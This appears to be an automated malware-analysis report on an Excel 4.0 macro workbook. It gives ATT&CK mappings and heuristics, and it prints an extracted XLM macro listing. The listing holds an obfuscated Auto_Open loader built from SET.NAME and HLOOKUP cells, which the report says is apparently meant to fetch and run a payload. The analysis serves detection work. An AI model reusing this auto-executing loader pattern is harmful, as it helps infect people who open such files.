Verdict: MALICIOUS
Risk Score: 140

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The file is an Excel 4.0 macro-enabled workbook containing an Auto_Open defined name, a known technique for executing code as soon as the workbook is opened. The critical heuristics indicate the presence of dangerous formula APIs within the Auto_Open macro, suggesting it is designed to download and execute a secondary payload. No specific malware family could be identified, but the execution method is clear.
Heuristics (3)

- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6722 bytes |

SHA-256: e797f215ab225d44065a3ab7ba382fca152d70731ba80d32d7c0cc424ba67b7e

Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 16 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - vQjxihE
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!B157
' 0018 24 LABEL : Cell Value, String Constant - bbYKGWpXE len=0
' 0018 25 LABEL : Cell Value, String Constant - bEcxqkoMjT len=0
' 0018 23 LABEL : Cell Value, String Constant - FGsHxpCc len=0
' 0018 23 LABEL : Cell Value, String Constant - GzAShXbA len=0
' 0018 21 LABEL : Cell Value, String Constant - IKfvIy len=0
' 0018 20 LABEL : Cell Value, String Constant - mRymn len=0
' 0018 26 LABEL : Cell Value, String Constant - njwiFuzTxRH len=0
' 0018 21 LABEL : Cell Value, String Constant - nnkVxz len=0
' 0018 25 LABEL : Cell Value, String Constant - OPTeguzEYD len=0
' 0018 22 LABEL : Cell Value, String Constant - pyvqfIi len=0
' 0018 20 LABEL : Cell Value, String Constant - qqyGA len=0
' 0018 27 LABEL : Cell Value, String Constant - swFCxsXTGpCA len=0
' 0018 27 LABEL : Cell Value, String Constant - TVEcjCekYMVI len=0
' 0018 24 LABEL : Cell Value, String Constant - VXOjywRrf len=0
' 0018 26 LABEL : Cell Value, String Constant - waqNgHSQIBM len=0
' 0018 24 LABEL : Cell Value, String Constant - wDrgQJaKg len=0
' 0018 26 LABEL : Cell Value, String Constant - wxMoanYGELY len=0
' 0018 27 LABEL : Cell Value, String Constant - WXtFMYcqThTU len=0
' 0018 25 LABEL : Cell Value, String Constant - xzYdvDxNAN len=0
' 0018 20 LABEL : Cell Value, String Constant - yxSim len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' vQjxihE,T65,"",-263.00000000000000000000
' vQjxihE,T66,"",41.00000000000000000000
' vQjxihE,T67,"",-789.00000000000000000000
' vQjxihE,T68,"",-678.00000000000000000000
' vQjxihE,T69,"",-618.00000000000000000000
' vQjxihE,B70,"SET.NAME("swFCxsXTGpCA",0+VALUE("0"))",""
' vQjxihE,T70,"",865.00000000000000000000
' vQjxihE,B74,"SET.NAME("FGsHxpCc",swFCxsXTGpCA)",""
' vQjxihE,B76,"SET.NAME("bbYKGWpXE",swFCxsXTGpCA)",""
' vQjxihE,B80,"SET.NAME("bEcxqkoMjT",COUNTA(yxSim))",""
' vQjxihE,B84,"SET.NAME("njwiFuzTxRH",COUNTA(qqyGA))",""
' vQjxihE,B86,[],""
' vQjxihE,B90,"SET.NAME("mRymn","")",""
' vQjxihE,B92,"FGsHxpCc",""
' vQjxihE,B95,"SET.NAME("GzAShXbA",HLOOKUP("*",yxSim,FGsHxpCc,FALSE))",""
' vQjxihE,B97,"VXOjywRrf",""
' vQjxihE,B100,"SET.NAME("wxMoanYGELY",swFCxsXTGpCA)",""
' vQjxihE,B105,[],""
' vQjxihE,B109,"wxMoanYGELY",""
' vQjxihE,B113,"wDrgQJaKg",""
' vQjxihE,B115,"nnkVxz",""
' vQjxihE,B118,"TVEcjCekYMVI",""
' vQjxihE,B120,"SET.NAME("OPTeguzEYD",VALUE(HLOOKUP("*",qqyGA,TVEcjCekYMVI,FALSE)))",""
' vQjxihE,B125,"IKfvIy",""
' vQjxihE,B127,"mRymn",""
' vQjxihE,B129,"bbYKGWpXE",""
' vQjxihE,B134,NEXT(),""
' vQjxihE,B138,"xzYdvDxNAN",""
' vQjxihE,B143,[],""
' vQjxihE,B146,"pyvqfIi",""
' vQjxihE,B150,NEXT(),""
' vQjxihE,B152,RETURN(),""
' vQjxihE,B183,"SET.NAME("WXtFMYcqThTU",B70)",""
' vQjxihE,B188,"yxSim",""
' vQjxihE,B190,"SET.NAME("qqyGA",R91C12)",""
' vQjxihE,B195,"SET.NAME("pyvqfIi",201)",""
' vQjxihE,B197,"SET.NAME("waqNgHSQIBM",2)",""
' vQjxihE,B200,WXtFMYcqThTU(),""
' vQjxihE,B201,HALT(),""